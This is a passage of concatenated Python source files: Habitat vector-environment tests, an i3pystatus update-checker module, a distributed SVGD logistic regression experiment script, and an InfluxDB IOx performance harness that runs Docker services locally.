_vec_env_test_fn(configs, datasets, "fork")
def test_vectorized_envs_fork():
configs, datasets = _load_test_data()
# 'fork' works in a process that has yet to use the GPU
# this test uses spawns a new python instance, which allows us to fork
mp_ctx = mp.get_context("spawn")
p = mp_ctx.Process(target=_fork_test_target, args=(configs, datasets))
p.start()
p.join()
assert p.exitcode == 0
def test_with_scope():
configs, datasets = _load_test_data()
num_envs = len(configs)
env_fn_args = tuple(zip(configs, datasets, range(num_envs)))
with habitat.VectorEnv(
env_fn_args=env_fn_args, multiprocessing_start_method="forkserver"
) as envs:
envs.reset()
assert envs._is_closed
def test_threaded_vectorized_env():
configs, datasets = _load_test_data()
num_envs = len(configs)
env_fn_args = tuple(zip(configs, datasets, range(num_envs)))
envs = habitat.ThreadedVectorEnv(env_fn_args=env_fn_args)
envs.reset()
non_stop_actions = [
v
for v in range(len(SimulatorActions))
if v != SimulatorActions.STOP.value
]
for i in range(2 * configs[0].ENVIRONMENT.MAX_EPISODE_STEPS):
observations = envs.step(np.random.choice(non_stop_actions, num_envs))
assert len(observations) == num_envs
envs.close()
def test_env():
config = get_config(CFG_TEST)
if not os.path.exists(config.SIMULATOR.SCENE):
pytest.skip("Please download Habitat test data to data folder.")
env = habitat.Env(config=config, dataset=None)
env.episodes = [
NavigationEpisode(
episode_id="0",
scene_id=config.SIMULATOR.SCENE,
start_position=[-3.0133917, 0.04623024, 7.3064547],
start_rotation=[0, 0.163276, 0, 0.98658],
goals=[NavigationGoal([-3.0133917, 0.04623024, 7.3064547])],
info={"geodesic_distance": 0.001},
)
]
env.reset()
non_stop_actions = [
v
for v in range(len(SimulatorActions))
if v != SimulatorActions.STOP.value
]
for _ in range(config.ENVIRONMENT.MAX_EPISODE_STEPS):
act = np.random.choice(non_stop_actions)
env.step(act)
# check for steps limit on environment
assert env.episode_over is True, (
"episode should be over after " "max_episode_steps"
)
env.reset()
env.step(SimulatorActions.STOP.value)
# check for STOP action
assert env.episode_over is True, (
"episode should be over after STOP " "action"
)
env.close()
def make_rl_env(config, dataset, rank: int = 0):
"""Constructor for default habitat Env.
:param config: configurations for environment
:param dataset: dataset for environment
:param rank: rank for setting seeds for environment
:return: constructed habitat Env
"""
env = DummyRLEnv(config=config, dataset=dataset)
env.seed(config.SEED + rank)
return env
def test_rl_vectorized_envs():
configs, datasets = _load_test_data()
num_envs = len(configs)
env_fn_args = tuple(zip(configs, datasets, range(num_envs)))
envs = habitat.VectorEnv(make_env_fn=make_rl_env, env_fn_args=env_fn_args)
envs.reset()
non_stop_actions = [
v
for v in range(len(SimulatorActions))
if v != SimulatorActions.STOP.value
]
for i in range(2 * configs[0].ENVIRONMENT.MAX_EPISODE_STEPS):
outputs = envs.step(np.random.choice(non_stop_actions, num_envs))
observations, rewards, dones, infos = [list(x) for x in zip(*outputs)]
assert len(observations) == num_envs
assert len(rewards) == num_envs
assert len(dones) == num_envs
assert len(infos) == num_envs
tiled_img = envs.render(mode="rgb_array")
new_height = int(np.ceil(np.sqrt(NUM_ENVS)))
new_width = int(np.ceil(float(NUM_ENVS) / new_height))
h, w, c = observations[0]["rgb"].shape
assert tiled_img.shape == (
h * new_height,
w * new_width,
c,
), "vector env render is broken"
if (i + 1) % configs[0].ENVIRONMENT.MAX_EPISODE_STEPS == 0:
assert all(dones), "dones should be true after max_episode steps"
envs.close()
def test_rl_env():
config = get_config(CFG_TEST)
if not os.path.exists(config.SIMULATOR.SCENE):
pytest.skip("Please download Habitat test data to data folder.")
env = DummyRLEnv(config=config, dataset=None)
env.episodes = [
NavigationEpisode(
episode_id="0",
scene_id=config.SIMULATOR.SCENE,
start_position=[-3.0133917, 0.04623024, 7.3064547],
start_rotation=[0, 0.163276, 0, 0.98658],
goals=[NavigationGoal([-3.0133917, 0.04623024, 7.3064547])],
info={"geodesic_distance": 0.001},
)
]
done = False
observation = env.reset()
non_stop_actions = [
v
for v in range(len(SimulatorActions))
if v != SimulatorActions.STOP.value
]
for _ in range(config.ENVIRONMENT.MAX_EPISODE_STEPS):
observation, reward, done, info = env.step(
np.random.choice(non_stop_actions)
)
# check for steps limit on environment
assert done is True, "episodes should be over after max_episode_steps"
env.reset()
observation, reward, done, info = env.step(SimulatorActions.STOP.value)
assert done is True, "done should be true after STOP action"
env.close()
def _make_dummy_env_func(config, dataset, id):
return DummyRLEnv(config=config, dataset=dataset, env_ind=id)
def test_vec_env_call_func():
configs, datasets = _load_test_data()
num_envs = len(configs)
env_fn_args = tuple(zip(configs, datasets, range(num_envs)))
true_env_ids = list(range(num_envs))
envs = habitat.VectorEnv(
make_env_fn=_make_dummy_env_func,
env_fn_args=env_fn_args,
multiprocessing_start_method="forkserver",
)
envs.reset()
env_ids = envs.call(["get_env_ind"] * num_envs)
assert env_ids == true_env_ids
env_id = envs.call_at(1, "get_env_ind")
assert env_id == true_env_ids[1]
envs.call_at(2, "set_env_ind", [20])
true_env_ids[2] = 20
env_ids = envs.call(["get_env_ind"] * num_envs)
assert env_ids == true_env_ids
envs.call_at(2, "set_env_ind", [2])
true_env_ids[2] = 2
env_ids = envs.call(["get_env_ind"] * num_envs)
assert env_ids == true_env_ids
envs.pause_at(3)
true_env_ids.pop(3)
env_ids = envs.call(["get_env_ind"] * num_envs)
assert env_ids == true_env_ids
envs.pause_at(0)
true_env_ids.pop(0)
env_ids = envs.call(["get_env_ind"] * num_envs)
assert env_ids == true_env_ids
envs.resume_all()
env_ids = envs.call(["get_env_ind"] * num_envs)
assert env_ids == list(range(num_envs))
envs.close()
# TODO Bring back this test for the greedy follower
@pytest.mark.skip
def test_action_space_shortest_path():
config = get_config()
if not os.path.exists(config.SIMULATOR.SCENE):
pytest.skip("Please download Habitat test data to data folder.")
env = habitat.Env(config=config, dataset=None)
# action space shortest path
source_position = env.sim.sample_navigable_point()
angles = [x for x in range(-180, 180, config.SIMULATOR.TURN_ANGLE)]
angle = np.radians(np.random.choice(angles))
source_rotation = [0, np.sin(angle / 2), 0, np.cos(angle / 2)]
source = AgentState(source_position, source_rotation)
reachable_targets = []
unreachable_targets = []
while len(reachable_targets) < 5:
position = env.sim.sample_navigable_point()
angles = [x for x in range(-180, 180, config.SIMULATOR.TURN_ANGLE)]
angle = np.radians(np.random.choice(angles))
rotation = [0, np.sin(angle / 2), 0, np.cos(angle / 2)]
if env.sim.geodesic_distance(source_position, position) != np.inf:
reachable_targets.append(AgentState(position, rotation))
while len(unreachable_targets) < 3:
position = env.sim.sample_navigable_point()
# Change height of the point to make it unreachable
position[1] = 100
angles = [x for x in range(-180, 180, config.SIMULATOR.TURN_ANGLE)]
angle = np.radians(np.random.choice(angles))
rotation = [0, np.sin(angle / 2), 0, np.cos(angle / 2)]
if env.sim.geodesic_distance(source_position, position) == np.inf:
unreachable_targets.append(AgentState(position, rotation))
targets = reachable_targets
shortest_path1 = env.sim.action_space_shortest_path(source, targets)
assert shortest_path1 != []
targets = unreachable_targets
shortest_path2 = env.sim.action_space_shortest_path(source, targets)
assert shortest_path2 == []
env.close()
|
__init__.py
|
import threading
from i3pystatus import SettingsBase, Module, formatp
from i3pystatus.core.util import internet, require
from i3pystatus.core.desktop import DesktopNotification
class Backend(SettingsBase):
settings = ()
updates = 0
class Updates(Module):
"""
Generic update checker.
To use select appropriate backend(s) for your system.
For list of all available backends see :ref:`updatebackends`.
Left clicking on the module will refresh the count of upgradeable packages.
This may be used to dismiss the notification after updating your system.
Right clicking shows a desktop notification with a summary count and a list
of available updates.
.. rubric:: Available formatters
* `{count}` — Sum of all available updates from all backends.
* For each backend registered there is one formatter named after the
backend, multiple identical backends do not accumulate, but overwrite
each other.
* For example, `{Cower}` (note capital C) is the number of updates
reported by the cower backend, assuming it has been registered.
.. rubric:: Usage example
::
from i3pystatus import Status
from i3pystatus.updates import pacman, cower
status = Status()
status.register("updates",
format = "Updates: {count}",
format_no_updates = "No updates",
backends = [pacman.Pacman(), cower.Cower()])
status.run()
"""
interval = 3600
settings = (
("backends", "Required list of backends used to check for updates."),
("format", "Format used when updates are available. "
"May contain formatters."),
("format_no_updates", "String that is shown if no updates are "
"available. If not set the module will be hidden if no updates "
"are available."),
("format_working", "Format used while update queries are run. By "
"default the same as ``format``."),
("format_summary", "Format for the summary line of notifications. By "
"default the same as ``format``."),
("notification_icon", "Icon shown when reporting the list of updates. "
"Default is ``software-update-available``, and can be "
"None for no icon."),
"color",
"color_no_updates",
"color_working",
("interval", "Default interval is set to one hour."),
)
required = ("backends",)
backends = None
format = "Updates: {count}"
format_no_updates = None
format_working = None
format_summary = None
notification_icon = "software-update-available"
color = "#00DD00"
color_no_updates = None
color_working = None
on_leftclick = "run"
on_rightclick = "report"
def init(self):
if not isinstance(self.backends, list):
self.backends = [self.backends]
if self.format_working is None: # we want to allow an empty format
self.format_working = self.format
if self.format_summary is None: # we want to allow an empty format
self.format_summary = self.format
self.color_working = self.color_working or self.color
self.data = {
"count": 0
}
self.notif_body = {}
self.condition = threading.Condition()
self.thread = threading.Thread(target=self.update_thread, daemon=True)
self.thread.start()
def update_thread(self):
self.check_updates()
while True:
with self.condition:
self.condition.wait(self.interval)
self.check_updates()
@require(internet)
def check_updates(self):
for backend in self.backends:
key = backend.__class__.__name__
if key not in self.data:
self.data[key] = "?"
if key not in self.notif_body:
self.notif_body[key] = ""
self.output = {
"full_text": formatp(self.format_working, **self.data).strip(),
"color": self.color_working,
}
updates_count = 0
for backend in self.backends:
name = backend.__class__.__name__
updates, notif_body = backend.updates
try:
updates_count += updates
except TypeError:
pass
self.data[name] = updates
self.notif_body[name] = notif_body or ""
if updates_count == 0:
self.output = {} if not self.format_no_updates else {
"full_text": self.format_no_updates,
"color": self.color_no_updates,
}
return
self.data["count"] = updates_count
self.output = {
"full_text": formatp(self.format, **self.data).strip(),
"color": self.color,
}
def run(self):
with self.condition:
self.condition.notify()
def report(self):
DesktopNotification(
title=formatp(self.format_summary, **self.data).strip(),
body="\n".join(self.notif_body.values()),
icon=self.notification_icon,
urgency=1,
timeout=0,
).display()
|
logreg.py
|
"""
Run with `python -m torch.distributed.launch --nproc_per_node=2 experiments/dist.py`
"""
import os
import shutil
import traceback
import click
import pandas as pd
from scipy.io import loadmat
import torch
import torch.distributed as dist
from torch.distributions.gamma import Gamma
from torch.distributions.multivariate_normal import MultivariateNormal
from torch.distributions.normal import Normal
from multiprocessing import Process
from definitions import DATA_DIR, RESULTS_DIR
import dsvgd
from logreg_plots import get_results_dir, make_plots
def run(rank, num_shards, dataset_name, fold, nparticles, niter, stepsize, exchange, wasserstein):
torch.manual_seed(rank)
# Define model
# Load data
mat = loadmat(os.path.join(DATA_DIR, 'benchmarks.mat'))
dataset = mat[dataset_name][0, 0]
# split #, instance, features/label
x_train = torch.from_numpy(dataset[0][dataset[2] - 1][fold]).to(torch.float)
t_train = dataset[1][dataset[2] - 1][fold]
samples_per_shard = int(x_train.shape[0] / num_shards)
d = 1 + x_train.shape[1]
alpha_prior = Gamma(1, 1)
w_prior = lambda alpha: MultivariateNormal(torch.zeros(x_train.shape[1]), torch.eye(x_train.shape[1]) / alpha)
def data_idx_range(rank):
"Returns the (start,end) indices of the range of data belonging to worker with rank `rank`"
return (samples_per_shard * rank, samples_per_shard * (rank+1))
def logp(shard, x):
"Estimate of full log likelihood using partition's local data."
# Get shard-local data
# NOTE: this will drop data if not divisible by num_shards
shard_start_idx, shard_end_idx = data_idx_range(shard)
x_train_local = x_train[shard_start_idx:shard_end_idx]
t_train_local = t_train[shard_start_idx:shard_end_idx]
alpha = torch.exp(x[0])
w = x[1:].reshape(-1)
logp = alpha_prior.log_prob(alpha)
logp += w_prior(alpha).log_prob(w)
logp += -torch.log(1. + torch.exp(-1.*torch.mv(t_train_local * x_train_local, w))).sum()
return logp
def kernel(x, y):
return torch.exp(-1.*torch.dist(x, y, p=2)**2)
# Initialize particles
q = Normal(0, 1)
make_sample = lambda: q.sample((d, 1))
particles = torch.cat([make_sample() for _ in range(nparticles)], dim=1).t()
dist_sampler = dsvgd.DistSampler(rank, num_shards, (lambda x: logp(rank, x)), kernel, particles,
samples_per_shard, samples_per_shard*num_shards,
exchange_particles=exchange in ['all_particles', 'all_scores'],
exchange_scores=exchange == 'all_scores',
include_wasserstein=wasserstein)
data = []
for l in range(niter):
if rank == 0:
print('Iteration {}'.format(l))
# save results right before updating particles
for i in range(len(dist_sampler.particles)):
data.append(pd.Series([l, torch.tensor(dist_sampler.particles[i]).numpy()], index=['timestep', 'value']))
dist_sampler.make_step(stepsize, h=10.0)
# save results after last update
for i in range(len(dist_sampler.particles)):
data.append(pd.Series([l+1, torch.tensor(dist_sampler.particles[i]).numpy()], index=['timestep', 'value']))
pd.DataFrame(data).to_pickle(
os.path.join(
get_results_dir(dataset_name, fold, num_shards, nparticles, stepsize, exchange, wasserstein),
'shard-{}.pkl'.format(rank)))
def init_distributed(rank, dataset_name, fold, nparticles, niter, stepsize, exchange, wasserstein):
try:
dist.init_process_group('tcp', rank=rank, init_method='env://')
rank = dist.get_rank()
num_shards = dist.get_world_size()
run(rank, num_shards, dataset_name, fold, nparticles, niter, stepsize, exchange, wasserstein)
except Exception as e:
print(traceback.format_exc())
raise e
@click.command()
@click.option('--dataset', type=click.Choice([
'banana', 'diabetis', 'german', 'image', 'splice', 'titanic', 'waveform']), default='banana')
@click.option('--fold', type=int, default=42)
@click.option('--nproc', type=click.IntRange(0,32), default=1)
@click.option('--nparticles', type=int, default=10)
@click.option('--niter', type=int, default=100)
@click.option('--stepsize', type=float, default=1e-3)
@click.option('--exchange', type=click.Choice(['partitions', 'all_particles', 'all_scores']), default='partitions')
@click.option('--wasserstein/--no-wasserstein', default=False)
@click.option('--master_addr', default='127.0.0.1', type=str)
@click.option('--master_port', default=29500, type=int)
@click.option('--plots/--no-plots', default=True)
@click.pass_context
def cli(ctx, dataset, fold, nproc, nparticles, niter, stepsize, exchange, wasserstein, master_addr, master_port, plots):
# clean out any previous results files
results_dir = get_results_dir(dataset, fold, nproc, nparticles, stepsize, exchange, wasserstein)
if os.path.isdir(results_dir):
shutil.rmtree(results_dir)
os.mkdir(results_dir)
if nproc == 1:
run(0, 1, dataset, fold, nparticles, niter, stepsize, exchange, wasserstein)
else:
os.environ['MASTER_ADDR'] = master_addr
os.environ['MASTER_PORT'] = str(master_port)
os.environ['WORLD_SIZE'] = str(nproc)
processes = []
for rank in range(nproc):
p = Process(target=init_distributed, args=(rank, dataset, fold, nparticles, niter, stepsize, exchange, wasserstein,))
p.start()
processes.append(p)
for p in processes:
p.join()
if plots:
ctx.forward(make_plots)
if __name__ == "__main__":
cli()
|
perf.py
|
#!/usr/bin/env python3
import argparse
import random
import glob
import logging
import math
import os
import pathlib
import shutil
import signal
import socket
import subprocess
import threading
import time
import docker
import grpc_requests
import minio
import requests
import toml
import urllib3
ioxperf_name = "ioxperf"
ioxperf_labels = {ioxperf_name: None}
ioxperf_filters = {'label': ioxperf_name}
org_name = 'myorg'
bucket_name = 'mybucket'
db_name = '%s_%s' % (org_name, bucket_name)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--skip-build', help='do not build IOx, execute existing binaries', action='store_true')
parser.add_argument('--debug', help='build/execute debug IOx binaries instead of release', action='store_true')
parser.add_argument('--object-store', help='object store type', default='s3', choices=('memory', 's3', 'file'))
parser.add_argument('--kafka-zookeeper', help='use Kafka/ZooKeeper instead of Redpanda', action='store_true')
parser.add_argument('--hold', help='keep all services running after tests complete', action='store_true')
parser.add_argument('--cleanup', help='remove Docker assets and exit (TODO terminate IOx processes)',
action='store_true')
parser.add_argument('--no-volumes', help='do not mount Docker volumes', action='store_true')
parser.add_argument('--no-jaeger', help='do not collect traces in Jaeger', action='store_true')
parser.add_argument('batteries', help='name of directories containing test batteries, or "all"', nargs='*')
args = parser.parse_args()
do_trace = args.hold and not args.no_jaeger
os.chdir(os.path.dirname(os.path.abspath(__file__)))
try:
dc = docker.from_env()
except docker.errors.DockerException as e:
print('failed to communicate with Docker, is Docker running?')
exit(1)
if args.cleanup:
docker_cleanup_resources(dc)
return
cleanup_logs_and_volumes(dc)
batteries = args.batteries
if batteries == ['all']:
batteries = (
p.relative_to(os.getcwd())
for p
in pathlib.Path(os.getcwd()).iterdir()
if p.joinpath('datagen.toml').is_file()
)
else:
for battery in batteries:
p = pathlib.Path(os.getcwd()).joinpath(battery, 'datagen.toml')
if not p.is_file():
print('invalid battery "%s" - does not contain datagen.toml' % battery)
exit(1)
processes = {}
tests_pass = True
try:
if not args.skip_build:
build_with_aws = args.object_store == 's3'
cargo_build_iox(args.debug, build_with_aws)
docker_create_network(dc)
if args.kafka_zookeeper:
docker_run_zookeeper(dc, args.no_volumes)
docker_run_kafka(dc, args.no_volumes)
else:
docker_run_redpanda(dc, args.no_volumes)
if args.object_store == 's3':
docker_run_minio(dc, args.no_volumes)
if do_trace:
docker_run_jaeger(dc)
processes['iox_router'] = exec_iox(1, 'iox_router',
debug=args.debug, object_store=args.object_store, do_trace=do_trace)
processes['iox_writer'] = exec_iox(2, 'iox_writer',
debug=args.debug, object_store=args.object_store, do_trace=do_trace)
grpc_create_database(1, 2)
print('-' * 40)
for battery in batteries:
if not run_test_battery(battery, 1, 2, debug=args.debug, do_trace=do_trace):
tests_pass = False
print('-' * 40)
except Exception as e:
print(e)
tests_pass = False
if args.hold:
print('subprocesses are still running, ctrl-C to terminate and exit')
try:
signal.pause()
except KeyboardInterrupt:
pass
print('-' * 40)
for service_name, process in processes.items():
if process is None:
continue
print('%s <- SIGTERM' % service_name)
process.send_signal(signal.SIGTERM)
exit_code = process.wait(1.0)
if exit_code is None:
print('%s <- SIGKILL' % service_name)
process.send_signal(signal.SIGKILL)
if exit_code != 0:
print('%s exited with %d' % (service_name, exit_code))
docker_cleanup_resources(dc)
if not tests_pass:
exit(1)
def docker_cleanup_resources(dc):
containers = dc.containers.list(all=True, filters=ioxperf_filters)
if len(containers) > 0:
print('removing containers: %s' % ', '.join((c.name for c in containers)))
for container in containers:
container.remove(v=True, force=True)
networks = dc.networks.list(filters=ioxperf_filters)
if len(networks) > 0:
print('removing networks: %s' % ', '.join((n.name for n in networks)))
for network in networks:
network.remove()
def cleanup_logs_and_volumes(dc):
docker_cleanup_resources(dc)
volume_paths = glob.glob(os.path.join(os.getcwd(), 'volumes', '*'))
if len(volume_paths) > 0:
print('removing volume contents: %s' % ', '.join((os.path.relpath(p) for p in volume_paths)))
for path in volume_paths:
shutil.rmtree(path)
log_paths = glob.glob(os.path.join(os.getcwd(), 'logs', '*'))
if len(log_paths) > 0:
print('removing logs: %s' % ', '.join((os.path.relpath(p) for p in log_paths)))
for path in log_paths:
os.unlink(path)
def docker_create_network(dc):
dc.networks.create(name=ioxperf_name, driver='bridge', check_duplicate=True, scope='local',
labels=ioxperf_labels)
def docker_pull_image_if_needed(dc, image):
try:
dc.images.get(image)
except docker.errors.ImageNotFound:
print("pulling image '%s'..." % image)
dc.images.pull(image)
def docker_wait_container_running(container):
while True:
container.reload()
if container.status == 'running':
print("container '%s' has started" % container.name)
return
elif container.status == 'created':
print("waiting for container '%s' to start" % container.name)
time.sleep(0.1)
raise Exception("container '%s' status '%s' unexpected" % (container.name, container.status))
def pipe_container_logs_to_file(container, log_filename):
with pathlib.Path(os.path.join(os.getcwd(), 'logs')) as dir_path:
if not dir_path.exists():
os.mkdir(dir_path, mode=0o777)
logs = container.logs(stdout=True, stderr=True, stream=True, follow=True)
f = open(file=os.path.join(os.getcwd(), 'logs', log_filename), mode='wb', buffering=0)
def thread_function():
for entry in logs:
f.write(entry)
f.flush()
f.close()
threading.Thread(target=thread_function, daemon=True).start()
def check_port_open(addr, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port_open = sock.connect_ex((addr, port)) == 0
sock.close()
return port_open
def docker_run_redpanda(dc, no_volumes):
image = 'vectorized/redpanda:v21.7.6'
command = ['redpanda', 'start',
'--overprovisioned', '--smp 1', '--memory 128M', '--reserve-memory', '0M', '--node-id', '0',
'--check=false', '--kafka-addr', 'CLIENT://0.0.0.0:9092,EXTERNAL://0.0.0.0:9093',
'--advertise-kafka-addr', 'CLIENT://kafka:9092,EXTERNAL://localhost:9093']
name = '%s-%s' % (ioxperf_name, 'redpanda')
ports = {'9093/tcp': 9093}
if no_volumes:
volumes = None
else:
volumes = {os.path.join(os.getcwd(), 'volumes/redpanda'): {
'bind': '/var/lib/redpanda/data',
'mode': 'rw',
}}
docker_pull_image_if_needed(dc, image)
container = dc.containers.run(image=image, command=command, detach=True, name=name, hostname='kafka',
labels=ioxperf_labels, network=ioxperf_name, ports=ports, volumes=volumes)
docker_wait_container_running(container)
while True:
if check_port_open('127.0.0.1', 9093):
break
print('waiting for Redpanda to become ready')
time.sleep(0.1)
pipe_container_logs_to_file(container, 'redpanda.log')
print('Redpanda service is ready')
return container
def docker_run_zookeeper(dc, no_volumes):
image = 'docker.io/bitnami/zookeeper:3'
name = '%s-%s' % (ioxperf_name, 'zookeeper')
ports = {'2181/tcp': 2181}
env = {
'ALLOW_ANONYMOUS_LOGIN': 'yes',
}
if no_volumes:
volumes = None
else:
volumes = {os.path.join(os.getcwd(), 'volumes/zookeeper'): {
'bind': '/bitnami/zookeeper',
'mode': 'rw',
}}
docker_pull_image_if_needed(dc, image)
container = dc.containers.run(image=image, detach=True, environment=env, name=name, hostname='zookeeper',
labels=ioxperf_labels, network=ioxperf_name, ports=ports, volumes=volumes)
docker_wait_container_running(container)
while True:
if check_port_open('127.0.0.1', 2181):
break
print('waiting for ZooKeeper to become ready')
time.sleep(0.1)
pipe_container_logs_to_file(container, 'zookeeper.log')
print('ZooKeeper service is ready')
return container
def docker_run_kafka(dc, no_volumes):
image = 'docker.io/bitnami/kafka:2'
name = '%s-%s' % (ioxperf_name, 'kafka')
ports = {'9093/tcp': 9093}
env = {
'KAFKA_CFG_ZOOKEEPER_CONNECT': 'zookeeper:2181',
'ALLOW_PLAINTEXT_LISTENER': 'yes',
'KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP': 'CLIENT:PLAINTEXT,EXTERNAL:PLAINTEXT',
'KAFKA_CFG_LISTENERS': 'CLIENT://:9092,EXTERNAL://:9093',
'KAFKA_CFG_ADVERTISED_LISTENERS': 'CLIENT://kafka:9092,EXTERNAL://localhost:9093',
'KAFKA_INTER_BROKER_LISTENER_NAME': 'CLIENT',
'KAFKA_CFG_LOG_RETENTION_CHECK_INTERVAL_MS': '100',
}
if no_volumes:
volumes = None
else:
volumes = {os.path.join(os.getcwd(), 'volumes/kafka'): {
'bind': '/bitname/kafka',
'mode': 'rw',
}}
docker_pull_image_if_needed(dc, image)
container = dc.containers.run(image=image, detach=True, environment=env, name=name, hostname='kafka',
labels=ioxperf_labels, network=ioxperf_name, ports=ports, volumes=volumes)
docker_wait_container_running(container)
while True:
if check_port_open('127.0.0.1', 9093):
break
print('waiting for Kafka to become ready')
time.sleep(0.1)
pipe_container_logs_to_file(container, 'kafka.log')
print('Kafka service is ready')
return container
def docker_run_minio(dc, no_volumes):
image = 'minio/minio:RELEASE.2021-08-05T22-01-19Z'
command = 'server --address 0.0.0.0:9000 --console-address 0.0.0.0:9001 /data'
name = '%s-%s' % (ioxperf_name, 'minio')
ports = {'9000/tcp': 9000, '9001/tcp': 9001}
if no_volumes:
volumes = None
else:
volumes = {os.path.join(os.getcwd(), 'volumes/minio'): {
'bind': '/data',
'mode': 'rw',
}}
env = {
'MINIO_ROOT_USER': 'minio',
'MINIO_ROOT_PASSWORD': 'miniominio',
'MINIO_PROMETHEUS_AUTH_TYPE': 'public',
'MINIO_HTTP_TRACE': '/dev/stdout',
}
docker_pull_image_if_needed(dc, image)
container = dc.containers.run(image=image, command=command, detach=True, environment=env, name=name,
hostname='minio', labels=ioxperf_labels, network=ioxperf_name, ports=ports,
volumes=volumes)
docker_wait_container_running(container)
while True:
timeout = urllib3.util.Timeout(connect=0.1, read=0.1)
http_client = urllib3.PoolManager(num_pools=1, timeout=timeout, retries=False)
try:
mc = minio.Minio(endpoint='127.0.0.1:9000', access_key='minio', secret_key='miniominio', secure=False,
http_client=http_client)
if not mc.bucket_exists('iox1'):
mc.make_bucket('iox1')
if not mc.bucket_exists('iox2'):
mc.make_bucket('iox2')
break
except (urllib3.exceptions.ProtocolError, urllib3.exceptions.TimeoutError, minio.error.S3Error):
pass
print('waiting for Minio to become ready')
time.sleep(0.5)
pipe_container_logs_to_file(container, 'minio.log')
print('Minio service ready')
return container
def docker_run_jaeger(dc):
image = 'jaegertracing/all-in-one:1.26'
name = '%s-%s' % (ioxperf_name, 'jaeger')
ports = {'16686/tcp': 16686, '6831/udp': 6831}
docker_pull_image_if_needed(dc, image)
container = dc.containers.run(image=image, detach=True, name=name, hostname='jaeger', labels=ioxperf_labels,
network=ioxperf_name, ports=ports)
docker_wait_container_running(container)
while True:
try:
if requests.get(url='http://127.0.0.1:16686/search', timeout=0.1).status_code / 100 == 2:
break
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout):
pass
print('waiting for Jaeger to become ready')
time.sleep(0.1)
pipe_container_logs_to_file(container, 'jaeger.log')
print('Jaeger service ready')
return container
def cargo_build_iox(debug=False, build_with_aws=True):
t = time.time()
print('building IOx')
features = []
if build_with_aws:
features.append('aws')
features = ','.join(features)
env = os.environ.copy()
args = ['cargo', 'build']
if debug:
env['RUSTFLAGS'] = '-C debuginfo=1'
env['RUST_BACKTRACE'] = '1'
else:
args += ['--release']
args += ['--package', 'influxdb_iox', '--features', features, '--bin', 'influxdb_iox']
args += ['--package', 'iox_data_generator', '--bin', 'iox_data_generator']
process = subprocess.run(args=args, env=env)
if process.returncode != 0:
raise ChildProcessError('cargo build returned %d' % process.returncode)
print('building IOx finished in %.2fs' % (time.time() - t))
def exec_iox(id, service_name, debug=False, object_store='memory', print_only=False, do_trace=False):
http_addr = 'localhost:%d' % (id * 10000 + 8080)
grpc_addr = 'localhost:%d' % (id * 10000 + 8082)
if debug:
iox_path = os.path.abspath(os.path.join(os.getcwd(), '../target/debug/influxdb_iox'))
else:
iox_path = os.path.abspath(os.path.join(os.getcwd(), '../target/release/influxdb_iox'))
args = [iox_path, 'run']
env = {
'INFLUXDB_IOX_ID': str(id),
'INFLUXDB_IOX_BIND_ADDR': http_addr,
'INFLUXDB_IOX_GRPC_BIND_ADDR': grpc_addr,
'INFLUXDB_IOX_BUCKET': 'iox%d' % id,
'LOG_DESTINATION': 'stdout',
'LOG_FORMAT': 'full',
'RUST_BACKTRACE': '1',
'LOG_FILTER': 'debug,lifecycle=info,rusoto_core=warn,hyper=warn,h2=warn',
}
if do_trace:
env['TRACES_EXPORTER'] = 'jaeger'
env['TRACES_EXPORTER_JAEGER_AGENT_HOST'] = 'localhost'
env['TRACES_EXPORTER_JAEGER_AGENT_PORT'] = '6831'
env['TRACES_EXPORTER_JAEGER_SERVICE_NAME'] = service_name
env['TRACES_SAMPLER'] = 'always_on'
if object_store == 'memory':
env['INFLUXDB_IOX_OBJECT_STORE'] = 'memory'
elif object_store == 's3':
env['INFLUXDB_IOX_OBJECT_STORE'] = 's3'
env['AWS_ACCESS_KEY_ID'] = 'minio'
env['AWS_SECRET_ACCESS_KEY'] = 'miniominio'
env['AWS_ENDPOINT'] = 'http://localhost:9000'
elif object_store == 'file':
env['INFLUXDB_IOX_OBJECT_STORE'] = 'file'
env['INFLUXDB_IOX_DB_DIR'] = 'volumes/%s' % service_name
else:
raise ValueError('invalid object_store value "%s"' % object_store)
if print_only:
print()
for k in sorted(env.keys()):
print('%s=%s' % (k, env[k]))
print(' '.join(args))
print()
return None
log_file = open('logs/%s.log' % service_name, mode='w')
process = subprocess.Popen(args=args, env=env, stdout=log_file, stderr=log_file)
while True:
if process.poll() is not None:
raise ChildProcessError('service %s stopped unexpectedly, check %s' % (service_name, log_file.name))
router = grpc_requests.Client(grpc_addr, lazy=True)
while True:
try:
router.register_service('influxdata.iox.management.v1.ManagementService')
break
except:
# fall through to retry
pass
try:
server_status_response = router.request('influxdata.iox.management.v1.ManagementService', 'GetServerStatus',
None)
if 'server_status' in server_status_response and server_status_response['server_status'][
'initialized'] is True:
break
except:
# fall through to retry
pass
print('waiting for %s to become ready' % service_name)
time.sleep(0.1)
print('%s service ready' % service_name)
return process
def grpc_create_database(router_id, writer_id):
print('creating database "%s" on both IOx servers' % db_name)
router_db_rules = {
'rules': {
'name': db_name,
'partition_template': {
'parts': [
{'time': '%Y-%m-%d %H:00:00'},
],
},
'lifecycle_rules': {
'immutable': True,
'worker_backoff_millis': '1000',
'catalog_transactions_until_checkpoint': '100',
'late_arrive_window_seconds': 300,
'persist_row_threshold': '1000000',
'persist_age_threshold_seconds': 1800,
'mub_row_threshold': '100000',
'max_active_compactions_cpu_fraction': 1.0,
},
'routing_config': {'sink': {'kafka': {}}},
'worker_cleanup_avg_sleep': '500s',
'write_buffer_connection': {
'direction': 'DIRECTION_WRITE',
'type': 'kafka',
'connection': '127.0.0.1:9093',
'connection_config': {},
'creation_config': {
'n_sequencers': 1,
'options': {},
},
},
},
}
writer_db_rules = {
'rules': {
'name': db_name,
'partition_template': {
'parts': [
{'time': '%Y-%m-%d %H:00:00'}
],
},
'lifecycle_rules': {
'buffer_size_soft': 1024 * 1024 * 1024,
'buffer_size_hard': 1024 * 1024 * 1024 * 2,
'worker_backoff_millis': 100,
'max_active_compactions': 1,
'persist': True,
'persist_row_threshold': 10000000,
'catalog_transactions_until_checkpoint': 100,
'late_arrive_window_seconds': 300,
'persist_age_threshold_seconds': 1800,
'mub_row_threshold': 100000,
},
'routing_config': {'sink': {'kafka': {}}},
'worker_cleanup_avg_sleep': '500s',
'write_buffer_connection': {
'direction': 'DIRECTION_READ',
'type': 'kafka',
'connection': '127.0.0.1:9093',
'connection_config': {},
'creation_config': {
